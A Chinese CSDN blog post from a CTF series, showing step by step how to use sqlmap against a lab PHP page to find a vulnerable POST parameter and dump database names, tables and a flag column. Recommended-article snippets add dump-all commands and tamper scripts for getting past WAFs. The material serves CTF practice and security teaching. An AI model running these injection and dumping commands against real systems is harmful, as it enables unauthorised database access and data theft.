【sqlmap使用】

最新推荐文章于 2025-06-04 15:49:38 发布
最新推荐文章于 2025-06-04 15:49:38 发布
阅读量218 收藏 2
点赞数 4
分类专栏: CTF 文章标签: 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_45131319/article/details/143086093
版权

sqlmap简介

sqlmap 目录结构

请添加图片描述

sqlmap常用参数

请添加图片描述
请添加图片描述

sqlmap实现注入

测试注入点,检测到注入点后,直接爆数据库名

python sqlmap.py –u http://172.16.12.2/7/9/strsql.php  --data "username=admin" --dbs

请添加图片描述
注意sqlmap在使用过程中可能会出现几个需要输入的参数y/n, 按照下面的输入就可以

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n

injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] n
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n

若电脑上存在多个版本的python,在使用时需指定python版本,注意下面的python2:
请添加图片描述
后面的 --data “username=admin” 意思是strsql.php这个文件的参数是username,data的意思是post方式提交的:
请添加图片描述
跑出来后的结果是web,还帮我们确认了数据库的版本号:
请添加图片描述

拿表名
python sqlmap.py -u "http://172.16.12.2/7/9/strsql.php"  --data "username=admin" -D web --tables
表名:zflag,user

拿列名
python sqlmap.py -u "http://172.16.12.2/7/9/strsql.php"  --data "username=admin" -D web -T zflag --columns
拿到列名
列名:flag
类型:varchar(40)

拿数据
python sqlmap.py -u "http://172.16.12.2/7/9/strsql.php"  --data "username=admin" -D web -T zflag -C flag --dump
史上最详细的sqlmap使用教程
大河之犬的博客
09-19 5万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQLSQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
sqlmap使用手册(SQLMap下载、安装、使用)
啊渊的专栏
01-16 380
数据库指纹识别从数据库中获取数据访问底层文件系统在操作系统上执行命令它全面支持多种数据库管理系统,如MySQL、Oracle、PostgreSQL、Microsoft SQL Server等。此外,sqlmap还支持多种SQL注入技术,包括基于布尔盲、基于时间盲、基于错误、基于UNION查询、堆栈查询和带外查询等。
iwebsec靶场 SQL注入漏洞通关笔记3- bool注入(布尔型盲注)
mooyuan的网络安全博客
11-26 2902
iwebsec靶场的SQL注入漏洞的第03关bool注入漏洞渗透,通过源码再来分析下布尔型SQL注入重点内容:(1)闭合方式是什么?iwebsec的第03关关卡为数字型(2)注入类别是什么?这部分通过源码分析与手注很容易判断出是布尔型注入(3)是否过滤了关键字?很明显通过源码,iwebsec的布尔型关卡无过滤任何信息了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的第3关bool注入内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。
iwebsec靶场 SQL注入漏洞通关笔记4- sleep注入(时间型盲注)
mooyuan的网络安全博客
11-26 2003
iwebsec靶场的SQL注入漏洞的第04关sleep注入漏洞渗透,iwebsec靶场的时间型盲注由于没有任何过滤信息,与bool型盲注一样为数字型布尔盲注,故而使用sqlmap渗透十分方便高效。时间型盲注相对而言十分耗时,手注或者半自动化注入相对而言操作过程较为麻烦,初学者还是应该以手动与半自动化注入结合方法练习,真正了解原理后可以在使用sqlmap来提升速度。
Victor CMS v1.0 SQL 注入漏洞(CVE-2022-28060)
Flag少侠的博客
07-01 1万+
CVE-2022-28060 是 Victor CMS v1.0 中的一个SQL注入漏洞。该漏洞存在于文件中的user_name参数。攻击者可以通过发送特制的 SQL 语句,利用这个漏洞执行未授权的数据库操作,从而访问或修改数据库中的敏感信息。春秋云镜靶场是一个专注于网络安全培训和实战演练的平台,旨在通过模拟真实的网络环境和攻击场景,提升用户的网络安全防护能力和实战技能。这个平台主要提供以下功能和特点:实战演练:提供各种网络安全攻防演练场景,模拟真实的网络攻击事件,帮助用户在实际操作中掌握网络安全技术。
渗透测试基础篇——sqlmap,nmap,burp工具使用
kreas的博客
05-31 1878
源系统向目标系统发一个 syn 请求,请求中包含一个端口号,如果目标端口开启,目标系统通过 syn/ack 来响应源系统,源系统通过 rst 响应目标系统,来断开连接。可以选择主动扫描或者被动扫描,主动扫描过程中会发送新的请求 payload 验证漏洞,被动扫描时 bp 不会重新发送请求,在已经存在的请求和应答分析。使用 FIN 进行测试,T 表示扫描过程中的时序(0-5),值越高扫描速度越快,容易被防火墙屏蔽。主动扫描:xss,http 头注入,重定向,sql 注入,命令行注入,文件遍历、
SQL注入原理和 SQLMAP使用
weixin_44603865的博客
08-07 470
SQL 注入
Sqlmap使用手册中文版
01-13
学习使用Sqlmap,除了阅读其官方文档和用户手册,还可以配合像sqli-labs这样的实验系统进行实践。用户手册详尽地介绍了Sqlmap的所有选项和开关,提供了丰富的实例,帮助用户理解和掌握如何有效使用这个工具。 当...
SQLMAP使用笔记.pdf
01-25
SQLMAP 使用笔记 SQLMAP 是一个开源的渗透测试工具,用于检测和利用 SQL 注入漏洞。下面是 SQLMAP使用笔记,包括常用参数、选项和示例。 一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> ...
SQLmap使用
Xlucas的博客
07-30 489
sqlmap 是一个开源的渗透测试工具,专门用于自动化检测和利用SQL注入漏洞,以及对数据库服务器进行数据获取和访问操作系统文件系统。Windows注册表访问(Windows registry access)操作系统访问(Operating system access)2、我们可以通过py sqlmap.py -hh查看命令参数。文件系统访问(File system access)技术(Techniques)注入(Injection)检测(Detection)请求(Request)
CTFHub SQl注入 时间盲注(sqlmap
赤城封雪的博客
08-07 5647
CTFHub SQl注入 时间盲注(sqlmap) 0x00 简单介绍 这篇文章主要通过 CTFHub 时间盲注案例简单记录一下 sqlmap使用流程。 参考:sqlmap用户手册 | WooYun知识库 (xmd5.com) sqlmap 的功能: 1、判断可注入的参数 2、判断可以用那种SQL注入技术来注入 3、识别出哪种数据库 4、根据用户选择,读取哪些数据 (具体过程可见文章末尾案例) sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2
SourceCodester v1.0 SQL 注入漏洞(CVE-2023-2130)
Flag少侠的博客
07-19 1万+
打开靶场直接进入是需要登录的访问漏洞页面如下传送 id 参数试试使用 SQLMap 爆库_____H__[Y/n] n[Y/n] n[y/N] n[Y/n] n[Y/n] n[y/N] n------[*] mysql爆表_____H__------[7 tables]| users |爆字段_____H__------爆数据_____H__------[1 entry]| flag |
【mac 安全渗透测试】之SQL注入Demo
LYX_WIN
12-22 3920
一、下载安装sqlmap 1、官网地址:sqlmap: automatic SQL injection and database takeover tool git下载: git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev 2、验证sqlmap安装成功: ./sqlmap.py -v 显示如下日志则说明成功: __H__ ___ ___[)]_____ ___ ___ {1
SQL注入-15】自动化注入案例—以sqli-labs-less9为例(利用sqlmap工具)
m0_64378913的博客
05-12 2930
目录1 前言[09:55:46] [INFO] testing connection to the target URL [09:55:46] [INFO] checking if the target is protected by some kind of WAF/IPS [09:55:46] [INFO] testing if the target URL content is stable [09:55:47] [INFO] target URL content is stable [09:55:4
Numpy50道练习题
左撇子
04-02 2643
这是在stackoverflow和numpy文档里汇总的numpy练习题,目的是为新老用户提供快速参考。 1. Import the numpy package under the namenp(★☆☆) 导入numpy包,命名为np importnumpyasnp 2. Print the numpy version and the configuration (★☆...
sqlmap用法
热门推荐
keepxp的博客
07-28 2万+
Sqlamp Usage https://github.com/sqlmapproject/sqlmap/wiki/Usage Usage: python sqlmap.py [options] Options: -h, --help Show basic help message and exit -hh Show ad
【大模型:知识图谱】--3.py2neo连接图数据库neo4j
我是个好人呀,????
06-03 1278
本文介绍了Neo4j图数据库的安装与基本操作。主要内容包括:1) 使用py2neo连接Neo4j数据库;2) 通过Python实现节点创建、删除、属性修改等操作;3) 建立节点间关系的方法;4) 使用NodeMatcher和RelationshipMatcher进行节点和关系查询;5) 通过实例演示如何创建人物节点及其关系网络。文章还对比了Neo4j社区版和企业版的差异。全文提供了完整的代码示例,涵盖从连接到CRUD操作的完整流程。
那些常用的运维工具
A_Tevens的博客
05-31 946
文章摘要:主要监控工具对比分析显示,Zabbix适合中小规模运维,提供灵活告警但配置复杂;Nagios擅长自动化运维但历史追溯弱;Open-Falcon适用于高并发场景;Prometheus+Grafana是云原生监控首选;商用方案如监控宝提供多地域监控但成本较高。专项工具包括ELK日志分析、Lepus数据库监控等。不同场景需匹配不同工具特性,如Zabbix的API集成、Prometheus的云原生支持等。
如何快速找出某表的重复记录 - 数据库专家面试指南
最新发布
hixiaoyang的博客
06-04 807
本文详细介绍了数据库重复记录的检测方法,从基础GROUP BY到高级窗口函数方案,并针对不同数据库系统提供了优化实现。文章强调性能优化策略如索引创建和分块处理,同时探讨了模糊匹配等高级场景。最后提供了面试可能追问的扩展问题和各方法对比,指出业务理解比技术更重要。全文为数据库专家面试提供了全面的技术指导。
sqlmap使用
03-12
### 关于 SQLMap 使用教程 #### 工具概述 SQLMap 是一个功能强大的自动化 SQL 注入工具,可以用来检测并利用 SQL 注入漏洞以接管数据库服务器。此工具不仅能够识别不同类型的注入点,还能执行多种攻击向量,并支持广泛的数据库管理系统 (DBMS)[^2]。 #### 常用参数说明 为了有效地使用 SQLMap 进行安全评估,了解一些基本命令行选项是非常重要的: - `-u` 或 `--url`: 指定目标 URL。 - `--data`: 提交 POST 数据给指定的目标页面。 - `--cookie`: 设置 HTTP Cookie 头中的值。 - `--level=<LEVEL>`: 设定测试级别,默认为 1;范围是从 1 到 5。 - `--risk=<RISK>`: 定义风险等级,默认为 1;可选值有 0, 1, 2 和 3。 - `--batch`: 自动选择默认选项而不提示用户输入。 - `--threads=<THREADS>`: 并发线程数(默认为 1),增加速度但可能引起更多噪音[^3]. ```bash sqlmap -u "http://example.com/vulnerable.php?id=1" ``` 这段代码展示了如何通过提供带有潜在注入点的 GET 请求来启动一次简单的扫描操作[^4]。 #### Tamper 脚本应用 Tamper 脚本允许修改请求包的内容,在某些情况下可以帮助绕过 Web 应用防火墙(WAF)或其他防护措施。例如,“randomcase.py” tamper 可随机改变大小写,从而混淆 WAF 的规则匹配机制[^1]: ```bash sqlmap -u "http://example.com/vulnerable.php?id=1" --tamper=randomcase.py ``` #### 实际案例分析 考虑这样一个场景——在一个低级别的 DVWA(Damn Vulnerable Web Application)环境中练习 SQL 注入技巧。这里展示了一个具体的应用实例,其中包含了从发现到提取敏感信息的过程[^5]。 ```bash # 发现注入点 sqlmap -u "http://dvwa.local/vulnerabilities/sqli/?id=1&Submit=Submit#" --dbms=mysql --dump-all --batch # 绕过 magic_quotes_gpc 防护 sqlmap -u "http://targetsite.com/index.php?search=test" --tamper=between.py --technique=B --level=5 --risk=3 ``` 上述命令分别演示了怎样在已知存在 SQLi 缺陷的服务上进行全面的数据转储以及采用特定技术手段规避 PHP 中启用的安全特性 Magic Quotes GPC 对单引号和双引号进行转义的影响。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值